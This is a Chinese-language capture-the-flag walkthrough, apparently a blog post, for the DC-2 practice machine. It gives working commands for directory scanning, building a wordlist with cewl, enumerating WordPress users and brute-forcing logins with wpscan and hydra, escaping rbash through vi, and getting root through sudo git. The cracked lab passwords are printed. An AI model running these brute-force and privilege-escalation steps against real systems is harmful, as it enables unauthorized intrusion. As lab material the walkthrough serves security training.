dc2
扫描

开放80端口,访问主页进不去,80端口下有提示
此时则需要修改/etc/hosts文件

使用目录扫描
dirsearch -u http://10.4.7.146
dirb http://10.4.7.146


渗透
flag1
修改完dns进入主页后,最后一个模块内容即为flag1

此页面内容提示使用从cewl获取字典,并且此网站wordpress搭的,所以可以使用wpscan获取字典
目录扫描时获取到了登录页
http://10.4.7.146/wp-admin/

cewl -w pojie1.txt http://dc-2

wpscan --url http://dc-2 --enumerate u

找到三个登录用户信息
写入文本文件当做字典

使用wpscan爆破登录用户密码
wpscan --url http://dc-2 -U pojie_user.txt -P pojie1.txt

得到登录用户信息
jerry:adipiscing
tom:parturient
先使用jerry登录上去看看

flag2
在pages模块中发现flag2

这是提示我们换条路试试,应该是ssh登录
此处可以用hydra爆破ssh确认一下
hydra -L pojie_user.txt -P pojie1.txt ssh://10.4.7.146:7744 -V -f -t 50

发现可以tom可以登录ssh
页面中media部分可以尝试文件上传,但是我没传成功,可能是wordpress权限不够
使用tom登录ssh
ssh tom@10.4.7.146 -p 7744
登录成功后,先查看一下信息,发现在rbash状态,使用受限

那就先列出可用的命令大概看一下
compgen -c


最后部分有个vi
flag3
ls列出发现flag3,使用vi命令查看内容

flag提示使用su,首先需要逃逸rbash
先使用vi编辑器开一个shell
vi新建一个文件,写入内容
:set shell=/bin/bash
:shell

随后保存退出
然后添加环境变量后,即可su到jerry
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin/

ps:此处如果无法直接成功添加环境变量,可以这样用
BASH_CMDS[a]=/bin/sh;a
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin/
flag4
jerry用户加目录下下存在flag4文件

提权及flag5
flag提示git提权,当然可以先试试别的提权能不能用

sudo -l发现可以以root身份执行git
sudo git -p help config
!/bin/bash

执行过后即为root身份,最终flag在/root目录下
sudo -l发现可以以root身份执行git
sudo git -p help config
!/bin/bash
执行过后即为root身份,最终flag在/root目录下

322

被折叠的 条评论
为什么被折叠?



